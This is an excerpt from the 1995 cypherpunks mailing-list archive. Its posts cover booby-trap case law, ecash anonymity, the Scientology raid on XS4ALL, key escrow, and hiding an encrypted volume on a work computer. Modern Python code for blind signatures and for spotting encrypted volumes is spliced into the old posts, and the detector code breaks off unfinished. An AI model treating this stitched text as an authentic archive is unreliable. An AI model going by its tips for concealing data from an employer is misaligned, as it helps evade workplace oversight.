refuse to assist them you are guilty of a crime (justifiably so).

> I would not call the second type a real booby trap, though some courts
> might, depending. A properly labelled electrified fence seems legal, on
> one's own property, but may not be. And certainly I think any
> explosive-rigged system is illegal, for explosives reasons if not for booby
> trap reasons.
> 

I don't know what you call it but if nothing else it is ethically and morally
reprehensible.

> I know of no case law on this, and suspect that if an FBI agent were to be
> electrocuted or blown up upon trying to open/use/disconnect the PC, even
> with clear warnings, that a prosecution would happen. Results are unclear
> (to me).
> 
> (I think that if an FBI agent were to be electrocuted while climbing on a
> clearly labelled electrified fence, no prosecution would result.)
> 

Of course not, the FBI as SOP turn the electricity, water, etc. off prior to
assaults. In either case the person responsible for the electrification
would find themselves in court facing some nasty charges. The law does not
recognize the awareness of the victim in these types of cases. It in general
falls to the owner/operator to ensure safe operating conditions. In the
case of electrification this would mean current limiting on the power
supply such that no permanent damage would result to the hapless.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Duncan Frissell <frissell@panix.com>
Date: Tue, 5 Sep 95 21:29:06 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Scientology and police visit XS4ALL Amsterdam
In-Reply-To: <v02120d09ac72ae60a310@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950905233610.5629A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> I am wondering about the legalities of booby trapped computer equipment.
> Would it be legal if a clear warning to the fact was posted on the
> hardware?

Generally not.  If you can kill the cops anyway (legally, I mean) 
you might get away with it but remember, Kunstler is dead now so 
getting a good defense might be tough.

DCF






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 20:57:27 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Growth of actions definded as crime. Which math formula?
In-Reply-To: <v02120d0cac72d4f2b20d@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950905235100.21053A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 20:50:44 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: cypherpunks@toad.com
> Subject: Growth of actions definded as crime. Which math formula?
> 
> With every session of Congress, previously legal acts become illegal. Has
> anyone worked out a function of this growth (number of crimes in the books
> vs. time)? I am not looking at the numbers of laws passed, but at
> individual acts that are defined to be illegal. If this has been studied,
> what is the formula? If anyone with access to more appropriate lists could
> please give me a pointer/forward the post there, I'd be grateful.
> 
> TIA,
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.

Really it's hard to answer this because what constitutes a "NEW" act is a 
real question in and of itself.

For example, wire fraud.  Is it a "NEW" crime?  Or just a subset of 
fraud, or mail fraud?

Carjacking... is that a new offense?  Or just a solidification and 
increase of punishment for armed robbery, unauthorized use of a motor 
vehicle, possession of stolen property, and grand theft auto?

Check forgery now has its own offense, but is this distinct from forgery?

Most "new offenses" are simply re-classifications of old offenses or 
efforts to move them into the federal arena.

I think the conception that entirely new acts are often made illegal 
(excepting burning the flag or some such) is an erroneous one.


---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 5 Sep 95 21:13:12 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
In-Reply-To: <199509060153.VAA14379@book.hks.net>
Message-ID: <9509060413.AA00437@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Lucky Green writes:
> The recipient can
> still determine who gets the goods paid for by the "anonymous" ecash by
> conventional means (hint: shipping address), 

...unless the goods are data.

-Futplex    mailto:futplex@pseudonym.com



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Davidwfox@eworld.com
Date: Wed, 6 Sep 95 00:59:22 PDT
To: www-buyinfo@allegra.att.com
Subject: Re: e$: More fun with cash: Senate Bill 307
Message-ID: <950906005854_14454028@eWorld.com>
MIME-Version: 1.0
Content-Type: text/plain



----------------------------- Begin Original Text -----------------------------
Has anyone heard about this bill?  Comments?

Cheers,
Bob Hettinga
----------------------------- End Original Text -----------------------------

There was an investigative article in a recent Readers Digest (no I'm not a
regular reader, heard it through Radio for the Print Handicapped in
Australia) regarding a major counterfeiting operation that uses the same printing
presses as used by US Treasury. The proceeds amount to BIG numbers and are
used to fund various terrorist organizations.

regards
David Fox
The e-commerce directory
www.kweb.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: eric@remailer.net (Eric Hughes)
Date: Wed, 6 Sep 95 01:28:08 PDT
To: cypherpunks-announce@toad.com
Subject: ANNOUNCE: September 1995 SF Bay Area physical meeting
Message-ID: <199509060824.BAA02026@largo.remailer.net>
MIME-Version: 1.0
Content-Type: text/plain


ANNOUNCEMENT
============

What: September 1995 SF Bay Area physical meeting
When: Saturday, 9 September 1995
      12:00 noon - 6:00 p.m.
Where: that hard-to-find loft space at 2nd & Brannan
       where we had July's meeting

This month's meeting is the "Even More Catastrophically Overnamed
Fourth Annual Cypherpunks Conclave, Congress, Schmooze-Fest, Meeting,
and Feast".

It's been three years since the first meeting at my house at the time
in Oakland.  If you only come to one meeting a year, come to this one.
It's canonical.

The agenda for this meeting is completely empty.  I've been out of
town for all but a total of about three weeks since the last meeting
two months ago (and I'm gone the rest of this week and flying in
Saturday morning).  So where in the past we've had something
approaching a schedule, this time I've not made even a pretense at
scheduling.  So just show up -- we always find something good to talk
about.

And besides, if you don't show up, you can't hear about my unexpected
genetic discovery!

Directions follow.  See you there.

Eric

-----------------------------------------------------------------------------

Exact Location:  340 Bryant St., 4th floor (top level); SF.

Directions:
1) From the East Bay--Cross the Bay Bridge and take the LEFT
exit for Main St./Embarcadero.  You will be making a series
of LEFT turns as follows :

LEFT on Harrison
LEFT on 2nd
LEFT on Bryant. PARK!  There is parking around the back of
the building, and also across the street.

2) From the Peninsula--101 North, take the 4th Street exit. 
(The last SF Exit before the Bay Bridge.  GET OFF HERE!) 
Follow to the RIGHT onto Bryant.
Once you've crossed Second St., PARK!

3) If you get LOST: Call 415/284-0252.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 22:58:40 PDT
To: Cypherpunks List <cypherpunks@toad.com>
Subject: Re: Are booby-trapped... [Detailed treatment]
In-Reply-To: <Pine.SUN.3.91.950905220511.3325B-100000@crl3.crl.com>
Message-ID: <Pine.SUN.3.91.950906014806.24142A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain



From tcmay@got.net Wed Sep  6 00:30:39 1995
Date: Tue, 5 Sep 1995 20:49:25 -0700
From: "Timothy C. May" <tcmay@got.net>
To: cypherpunks@toad.com
Subject: Are booby-trapped computers legal?


(I've changed the name of this thread.)

At 2:30 AM 9/6/95, Lucky Green wrote:

>>I am wondering about the legalities of booby trapped computer equipment.
>>Would it be legal if a clear warning to the fact was posted on the
>>hardware?

>There are two types of "booby traps" to consider:

>* Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if 
>and when a burglar enters. Or an electrified region of a room is set to 
>"get energized" when an intruder enters. These are "surprises" and are 
>canonical booby traps.

>These have been found to be illegal in several court cases. (I'm not a
>lawyer, but I've been reading about them for 20 years. Famous cases 
>where a burglar sued, and won, because he was injured when breaking 
>into a house.)

Katko v. Briney, 183 N.W.2d  657  (Iowa 1971).

The defendants owned an old, boarded-up house, located several miles 
from their home, in which they stored various old bottles, fruit jars 
and the like, which they considered to be antiques.  Several times 
during the previous several years the windows in the house had been 
broken and the entire place "messed up."  The defendants first posted 
"no trespass" signs to keep off intruders, but the break-ins continued.  
Shortly before the injury to the plaintiff, the defendants placed a 
"shotgun trap" in one of the bedrooms.  The gun was first positioned so 
as to hit an intruder in the stomach, but Mr. Briney, at his wife's 
insistence, lowered it to hit at the legs.  He said that he set the gun 
"because I was mad and tired of being tormented," but insisted that "he 
did not intend to injure anyone."

The plaintiff was shot in the legs and permanently injured when he entered 
the defendant's bedroom shortly after the gun was set.  He had been to 
the place several times before, and had intended upon this occasion to 
steal some of the defendant's possessions.  The plaintiff pleaded guilty 
to a charge of larceny and paid a fine of $50.  He also sued the 
defendant for personal injuries and was awarded $20,000 in actual 
damages and $10,000 in punitive damages.

[Jury instruction #6 was one of the items at issue in the appeal to the 
Iowa Supreme court]

Instruction 6 stated: "An owner of a premises is prohibited from 
willfully or intentionally injuring a trespasser by means of force that 
either takes life or inflicts great bodily injury and therefore a person 
owning a premise is prohibited from setting out "spring guns" and like 
dangerous devices which will likely take life or inflict great bodily 
injury, for the purpose of harming trespassers.  The fact that the 
trespasser may be acting in violation of the law does not change the 
rule.  The only time when such conduct of setting a "spring gun" or a 
like dangerous device is justified would be when the trespasser was 
committing a felony of violence or a felony punishable by death, or 
where the trespasser was endangering human life by his act."

[Upheld on appeal]

Note that the case caused a literal riot in Iowa.  Checks poured in to 
the Briney's (the boobytrappers) from everywhere (by one account, even 
from prisons).  They raised over $10,000 this way.  Briney was heard to 
comment: "They used booby traps in Viet Nam didn't they?"  Asked if he 
would do it again:  "There's one thing I'd do different, though, I'd 
have aimed that gun a few feet higher."  Reference is given to a front 
page story in the Chicago Trib. of April 25, 1975.

See also, Allison v. Fiscus, 156 Ohio St. 120, 100 N.E.2d 237 (1951).
[Plaintiff could collect damages when he was injured by a booby trap 
consisting of two sticks of dynamite even though he was feloniously 
breaking into defendant's warehouse with intent to steal.]

Some states allow a criminal liability, even of homicide, to landowners 
installing booby traps.

The basic rule today in most states resembles the restatement position:

Section 85.  Use of Mechanical Device Threatening Death or Serious 
Bodily Injury.

The actor is so far privileged to use such a device intended or likely 
to cause serious bodily harm or death for the purpose of protecting his 
land or chattels from intrusion that he is not liable for the serious 
bodily harm or death thereby caused to an intruder whose intrusion is, 
in fact, such that the actor, were he present, would be privileged to 
prevent or terminate it by the intentional infliction of such harm.

Some states have deviated from Section 85, however, California included.

People v. Caballos, 12 Cal. 470, 526 P.2d 241, 116 Cal. Rptr. 233 
(1974).  "It seems clear that the use of such [mechanical] devices 
should not be encouraged.  Moreover, whatever may be thought in torts, 
the [Restatement] rule setting forth an exception to liability for death 
or injuries inflicted by such devices 'is inappropriate in penal law for 
it is obvious that it does not prescribe a workable standard of conduct; 
liability depends on fortuitous results.'"  (i.e. what the trespasser was 
doing in there in the first place)

What constitutes reasonable force is generally a question for the jury.  
Some exceptions exist.

When the invasion is peaceful, and in the presence of the possessor, the 
use of any force at all will be unreasonable unless a request has been 
made to depart.  Chapell v. Schmidt, 38 P. 892 (1894) (Defendant caned 
elderly person who was picking flowers); A request need not be made 
however when conduct of the intruder would indicate to a reasonable 
person that it would be useless or that it could not safely be made in 
time.  See Higgins v. Minagham, 47 N.W. 941 (1891).

>* Type 2 Booby Trap: electrified perimeter fences. So long as these are
>adequately marked ("If you touch this fence, you will probably die"), 
>and are not public nuisances where children and pets will inadvertently
>validate Darwin's theory, these are--I think--legal. There may be 
>license fees required, to build an electrified fence, but I think it is 
>possible to build a lethal voltage electrified fence on one's property.


While clear notice of the danger of deadly force is a partial defense to 
criminal and civil liability in some states, (Starkey v. Dameron, 21 
P.2d 1112 (1933) [Colorado]; State v. Marfaudille, 92 P. 939 (1907) 
[Washington State]) and implicit or constructive notice in others 
(Quigley v. Clough, 53 N.E. 884 (1899) (Presence of barbed wire may 
constitute notice of deadly or injurious force)), some prohibit it 
outright, notice or not (State v. Plumlee, 149 So. 425 (1933) [La.]).

An obnoxiously exhaustive treatment of the entire subject can be found 
in Bohlen and Burns, The Privilege to Protect Property by Dangerous 
Barriers and Mechanical Devices, 35 Yale L.J. 535 (1926); or for a more 
interesting treatment (IMHO) Hart, Injuries to Trespassers, 47 Law 
Q.Rev. 92 (1931).


>Thus, I suspect it is fully legal to build an electrified fence around
>one's PC, providing suitable warnings are included.

Varies by state.  If your intent is to prevent ACCESS to the computer, 
as opposed to THEFT, I cannot see how electrocution could be considered 
"reasonable force" to prevent it, given the host of other methods to 
prevent access without harm to the trespasser.

>I would not call the second type a real booby trap, though some courts
>might, depending. A properly labelled electrified fence seems legal, on
>one's own property, but may not be.

I don't know that CRIMINAL liability will ensue in those states that 
exempt defenses with warnings, but certainly civil liability might.  
Never know what a jury will do.

>And certainly I think any explosive-rigged system is illegal, for 
>explosives reasons if not for booby trap reasons.

Again, reasonable force will be a question for the jury.  Explosives are 
a bit dramatic for a jury to swallow as "reasonable."  Explosives 
charges will likely be in counts 4&5.

>I know of no case law on this, and suspect that if an FBI agent were to 
>be electrocuted or blown up upon trying to open/use/disconnect the PC, 
>even with clear warnings, that a prosecution would happen. Results are 
>unclear (to me).
>(I think that if an FBI agent were to be electrocuted while climbing on 
>a clearly labelled electrified fence, no prosecution would result.)
>Of course, if a PC were to be clearly labelled as being rigged, then 
>steps could presumably be taken to defuse the arrangement.

Ominously, the possessor is responsible for determining the 
'trespasser's' right to enter the property.  In other words, if an 
officer with legal rights to enter the property was injured or killed by 
a booby trap (warnings or not) liability would almost without question 
ensue.  The only defined defense available would be the officer's 
contributory negligence (ignoring the sign- etc.).

My guess is that FBI enters, sees the PC, calls bomb squad, a member of 
bomb squad is injured by explosive or electrocution or whatever, 
liability ensues, warning or not.  At this point warning is not an issue 
as the possessor would not have the right to repel legally entitled 
officers were he present and thus cannot repel them while absent.

I've completely ignored the use of other deadly force in home invasion 
cases.  Mr. Sandfort was pretty close to right on there for Cali.


>--Tim May

>---------:---------:---------:---------:---------:---------:---------:----
>Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero

---
00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: carolann@censored.org (Carol Anne Braddock)
Date: Tue, 5 Sep 95 23:58:27 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509060658.XAA28913@mailhost.primenet.com>
MIME-Version: 1.0
Content-Type: text/plain


Anon.penet.fi succinctly scribed:

>     If a police officer has a warrant then I really don't have much
>     choice about letting him in.  Am I also under an obligation to
>     allow the people who filed for the warrant into my home or
>     business?

They aren't, but they do, and only a good civil rights lawyer
can help you out of the resulting quagmire. It's done in a lot
of civil cases, particularly where restraining orders are used.

Love ALways,

Carol Anne
--

Member Internet Society  - Certified BETSI Programmer  -  Webmistress
***********************************************************************
Carol Anne Braddock (cab8)  carolann@censored.org   206.42.112.96
My Homepage
The Cyberdoc
***********************************************************************
------------------ PGP.ZIP Part [017/713] -------------------
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
MF=O0H+*%(-S%&>S%+FS&<LS%3(Q&#W1"<]2%`H^;,]^1C$'HBN8PX$4SYAU^
MPGD<Q0ZLA0D+,`MCT!LA**4M[-JPAK9F?40!AJ,CW"'%DR#:'9?Q)3[%<DQ`
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@access.digex.net>
Date: Tue, 5 Sep 95 23:01:11 PDT
To: Lucky Green <shamrock@netcom.com>
Subject: Re: Growth of actions definded as crime. Which math formula?
In-Reply-To: <v02120d0fac72f40a1ca9@[192.0.2.1]>
Message-ID: <Pine.SUN.3.91.950906015851.24246A-100000@access2.digex.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 23:01:01 -0800
> From: Lucky Green <shamrock@netcom.com>
> To: Black Unicorn <unicorn@access.digex.net>
> Cc: cypherpunks@toad.com
> Subject: Re: Growth of actions definded as crime. Which math formula?
> 
> At 23:56 9/5/95, Black Unicorn wrote:
> rypted mail preferred.
> >
> >Really it's hard to answer this because what constitutes a "NEW" act is a
> >real question in and of itself.
> >
> >For example, wire fraud.  Is it a "NEW" crime?  Or just a subset of
> >fraud, or mail fraud?
> 
> If the guy would have gotten away before the new law was passed, it is a
> new crime.

This is very rare.  It's mostly in definitional cases, for example, where 
Ecstasy was just not defined as a controlled substance some years ago.

Created crimes are few and far between.

There's a lot of jurisprudence.  Criminals are creative, but there are 
only so many things that can't be covered by "Fraud."

> 
> That's the stats I am looking for.
> 
> -- Lucky Green <mailto:shamrock@netcom.com>
>    PGP encrypted mail preferred.
> 
> 
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa    -    wichtig!
*New Key Information*    -    Finger for key revocation and latest key update.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: anon-remailer@utopia.hacktic.nl (Anonymous)
Date: Tue, 5 Sep 95 17:25:23 PDT
To: A.W.S.Helwig@ET.TUDelft.NL
Subject: Secure Device 1.4 Question
Message-ID: <199509060025.CAA05098@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


I just installed Secure Device, v1.4 on a PC at work.  After 
installing it, I looked at the encrypted volume and found the string 
"SECDEV  " starting at the fourth byte of the file.  I'd prefer that 
this file look like some temporary file that got left on the disk by 
a program that didn't clean up properly after itself, and not be 
identifiable as an encrypted volume.

Is there a way to get Secure Device to not leave identifiable 
plaintext like that in the file?  Will I do any harm to the file if 
I replace that string with blanks, or something more innocuous?  If 
it's required to be there, then I'd like to put its removal on the 
"wish list" for the next version.  (I copied the file, replaced the 
string "SECDEV" with blanks using a hex editor, and then mounted the 
copy as an encrypted volume, and it seems to be working OK, but I 
wanted to make sure this won't cause unforeseen problems in the 
future.)

As you've probably guessed, I'm not supposed to have any personal 
files on my work computer, and an entire encrypted volume would 
undoubtedly make someone go ballistic if they discovered it.  When I 
want to use my encrypted file system, I reboot off of a floppy, and 
all Secure Device programs and drivers are kept on the floppy.  The 
only thing that has to be left on the hard drive is the encrypted 
volume itself.

Please post a copy of any replies to the Cypherpunks mailing list at 
"cypherpunks@toad.com".  Thanks.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:40:44 PDT
To: cypherpunks@toad.com
Subject: Re: Forgery, bills, and the Four Horsemen  (Articles and Comment)
Message-ID: <199509060638.CAA15606@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <199509060432.VAA05003@jobe.shell.portal.com>,
hfinney@shell.portal.com (Hal) wrote:

>P.S. Without seeing the technical specs it is hard to describe in detail,
>but generally Chaumian ecash allows fully anonymous coerced transfers.
>The payee/coercer supplies the blinded coins and forces the payor to use
>them to make withdrawals from his account.  The resulting signed
>tokens are passed to the coercer who unblinds them and now has fully
>anonymous, untraceable cash tokens which he can spend.

Assuming it can be done (I am checking), he would also have a large
balance on his non-anoymous Ecash account that he would have a very hard
time explaining to the IRS, FINsomething [sorry, forgot the name], and
other interested and certainly to be involved parties. Cyberspace is much
closer connected to the real world as many people on this list, myself
included, would like to think it is.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBME1B1SoZzwIn1bdtAQF7FwGAgqmPsLaol1LbR2zb+FI7nmYDlp7BY91G
SsT6iJukYmiKzcmG4YNPtGJ8QCrUGkZo
=CNiP
-----END PGP SIGNATURE-----
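
The exchange Hal describes in the quoted text rests on the blind-signature step of Chaum's scheme. As an added example (not from this thread or from any ecash implementation), here is that step with textbook RSA blinding, which is an assumption since the post gives no technical specs; the toy key, coin serials and function names are constructed for illustration.

```python
import hashlib
import secrets
from math import gcd

# Toy RSA key for the mint, constructed for this example (far too small for real use).
P, Q = 2**61 - 1, 2**31 - 1            # two known Mersenne primes
N, E = P * Q, 65537
D = pow(E, -1, (P - 1) * (Q - 1))      # mint's private exponent


def coin_digest(serial: bytes) -> int:
    """Integer the mint's signature must cover for a coin with this serial."""
    return int.from_bytes(hashlib.sha256(serial).digest(), "big") % N


def fresh_blinding_factor() -> int:
    """Random r that is invertible modulo N."""
    while True:
        r = secrets.randbelow(N - 2) + 2
        if gcd(r, N) == 1:
            return r


def blind(m: int, r: int) -> int:
    """What leaves the coin creator's hands: m * r^e mod N."""
    return (m * pow(r, E, N)) % N


def mint_sign(blinded: int, withdrawal_log: list) -> int:
    """Mint debits an account, records what it saw, and signs it."""
    withdrawal_log.append(blinded)
    return pow(blinded, D, N)


def unblind(signed_blinded: int, r: int) -> int:
    """Only the holder of r can strip the blinding: (m^d * r) * r^-1."""
    return (signed_blinded * pow(r, -1, N)) % N


def verify(serial: bytes, signature: int) -> bool:
    return pow(signature, E, N) == coin_digest(serial)


def explaining_factor(m: int, blinded: int) -> int:
    """The r under which coin digest m would blind to a logged value."""
    return pow(blinded * pow(m, -1, N) % N, D, N)


def run_exchange() -> dict:
    log = []
    serial = b"constructed-coin-0001"
    r = fresh_blinding_factor()
    blinded = blind(coin_digest(serial), r)
    signature = unblind(mint_sign(blinded, log), r)
    other = coin_digest(b"constructed-coin-0002")
    return {
        "token_valid": verify(serial, signature),
        "mint_saw_digest": coin_digest(serial) in log,
        "mint_saw_signature": signature in log,
        # Any other coin is equally consistent with the logged withdrawal.
        "other_coin_fits_log":
            blind(other, explaining_factor(other, log[0])) == log[0],
    }


if __name__ == "__main__":
    for name, value in run_exchange().items():
        print(f"{name}: {value}")
```

The last check shows that every coin digest can be made to fit a logged withdrawal, so the mint's withdrawal records identify the debited account but not the token later spent.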




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 23:43:14 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <199509060640.CAA15617@book.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In article <9509060434.AA09596@anon.penet.fi>, an253398@anon.penet.fi
(Mole Rat) wrote:

>     This is the second or third time I've seen descriptions of such
>     raids where cult (no, I'm not trying to be diplomatic)
>     representatives were present and participating.  Is this legal in
>     Amsterdam?  How about in the U.S.?  Britain?
>
>     If a police officer has a warrant then I really don't have much
>     choice about letting him in.  Am I also under an obligation to
>     allow the people who filed for the warrant into my home or
>     business?

I doubt it. Get a good attorney.

- -- 
- -- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBME1CaSoZzwIn1bdtAQGGyAF7BojcAMnxvfMcyJSWLHlJe0d0QezwdVGZ
paDopX2LMcxjuUgupNXgF1GwRPbvx2dl
=Dstl
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an253398@anon.penet.fi (Mole Rat)
Date: Tue, 5 Sep 95 22:07:21 PDT
To: cypherpunks@toad.com
Subject: Re: Scientology and police visit XS4ALL Amsterdam
Message-ID: <9509060434.AA09596@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


announce@xs4all.nl writes:
     [ snip ]
 >     Police and members of Scientology church enter offices of XS4ALL
 >     ================================================================
 > 
 > Amsterdam - Tuesday September 5, 1995.
 > 
 > Today at about 14:00, XS4ALL was visited by Mr. S. Braan,
 > bailiff. He was acting on behalf of the Religious
 > Technology Centre, better known as the Scientology Church, or
 > Scientology for short. He was assisted by a local police officer and Mr.
 > Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology
 > in The Netherlands. Also present were two computer experts (Mr. Ootjes
 > and Mr. Van Suchtelen) a locksmith (to enter had we not been present) and
 > two American employees of Scientology, Mr. Weightman and Ms. Jenssen.
     [ snip ]

     This is the second or third time I've seen descriptions of such
     raids where cult (no, I'm not trying to be diplomatic)
     representatives were present and participating.  Is this legal in
     Amsterdam?  How about in the U.S.?  Britain?

     If a police officer has a warrant then I really don't have much
     choice about letting him in.  Am I also under an obligation to
     allow the people who filed for the warrant into my home or
     business?

     Thanks,

     Mole Rat
----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 01:57:46 PDT
To: jim@rand.org (Jim Gillogly)
Subject: Re: Another Son of Clipper discussion paper
In-Reply-To: <199509052053.NAA01226@mycroft.rand.org>
Message-ID: <199509060858.EAA15990@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> 
> Key Escrow Issues Meeting, September 6-7, 1995
> Discussion Paper #3
> 
>                  Export Criteria Discussion Draft --
>                 64-bit Software Key Escrow Encryption

Pardon my obvious question, but if there's some sort of GAK/LEAF, then
why limit it to 64-bit? It seems possible that the assumption is 'just
in case the GAK is tampered with' there's still a chance of cracking it,
should the need arise.

[..]

I'm wondering just how securely a hack-proof escrow system can be written.
It seems that someone can always go in with a sophisticated debugger and
do some tampering of the software.

And one need not mention the what-if-foreign-competitors-do-not-implement-
this-scheme? question...




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Deranged Mutant <rrothenb@ic.sunysb.edu>
Date: Wed, 6 Sep 95 02:14:01 PDT
To: cypherpunks@toad.com
Subject: Re: Secure Device 1.4 Question
In-Reply-To: <199509060025.CAA05098@utopia.hacktic.nl>
Message-ID: <199509060915.FAA16064@libws4.ic.sunysb.edu>
MIME-Version: 1.0
Content-Type: text/plain



> I just installed Secure Device, v1.4 on a PC at work.  After 
> installing it, I looked at the encrypted volume and found the string 
> "SECDEV  " starting at the fourth byte of the file.  I'd prefer that 
> this file look like some temporary file that got left on the disk by 
> a program that didn't clean up properly after itself, and not be 
> identifiable as an encrypted volume.

Problems with that:
  1. SecDev needs a way to easily ID its own files. Encrypting a known
     ID string would be a weakness (known plaintext) so it's better to
     have a plaintext identifier.

  2. If someone thinks it's a lost TMP file they will delete it. Not a
     risk you want.  It's better if they think it's a strange type of
     swap file or something needed by an application.


[..]

Source is available... so you can change the ID string in source to
something innocuous yet unique and recompile it.

> As you've probably guessed, I'm not supposed to have any personal 
> files on my work computer, and an entire encrypted volume would 
> undoubtedly make someone go ballistic if they discovered it.  When I 
> want to use my encrypted file system, I reboot off of a floppy, and 
> all Secure Device programs and drivers are kept on the floppy.  The 
> only thing that has to be left on the hard drive is the encrypted 
> volume itself.

Well, there's a risk of someone seeing a mysterious file and deleting
it anyway... assuming they don't go ballistic over it anyhow.

There's also a risk of someone peering over your shoulder and noticing
that something's afoot as well, is there not?
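
The trade-off discussed in this thread, a fixed plaintext label versus a file with no label at all, can be seen from the auditing side. The following is an added example, not code from the thread or from Secure Device: it checks for the "SECDEV  " string at the fourth byte and, when that is absent, falls back to a byte-entropy estimate. It assumes the rest of the volume is ciphertext and therefore near-random; the threshold, sample size and function names are illustrative, and the sample files are constructed.

```python
import hashlib
import math
from collections import Counter

MARKER = b"SECDEV  "      # string quoted in the thread (8 bytes, trailing blanks)
MARKER_OFFSET = 3         # "starting at the fourth byte" -> zero-based offset 3
ENTROPY_THRESHOLD = 7.5   # bits per byte; assumed cut-off, tune on your own data
SAMPLE_SIZE = 64 * 1024   # bytes examined per file
MIN_SAMPLE = 4096         # entropy of very short files is not meaningful


def has_marker(data: bytes) -> bool:
    """True if the identifying string sits at the expected offset."""
    return data[MARKER_OFFSET:MARKER_OFFSET + len(MARKER)] == MARKER


def shannon_entropy(data: bytes) -> float:
    """Empirical byte entropy in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    total = len(data)
    return -sum(c / total * math.log2(c / total)
                for c in Counter(data).values())


def classify(data: bytes) -> str:
    """Return 'marker', 'high-entropy' or 'plain' for a file's leading bytes."""
    sample = data[:SAMPLE_SIZE]
    if has_marker(sample):
        return "marker"
    # Compressed archives also score high here, so this is a lead, not proof.
    if len(sample) >= MIN_SAMPLE and shannon_entropy(sample) >= ENTROPY_THRESHOLD:
        return "high-entropy"
    return "plain"


def classify_file(path: str) -> str:
    with open(path, "rb") as handle:
        return classify(handle.read(SAMPLE_SIZE))


def _pseudo_ciphertext(length: int) -> bytes:
    """Deterministic stand-in for an encrypted body (constructed sample)."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(b"constructed" + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def make_samples() -> dict:
    """Three constructed inputs: labelled volume, blanked label, ordinary text."""
    body = _pseudo_ciphertext(SAMPLE_SIZE)
    labelled = bytearray(16)
    labelled[MARKER_OFFSET:MARKER_OFFSET + len(MARKER)] = MARKER
    blanked = bytearray(16)
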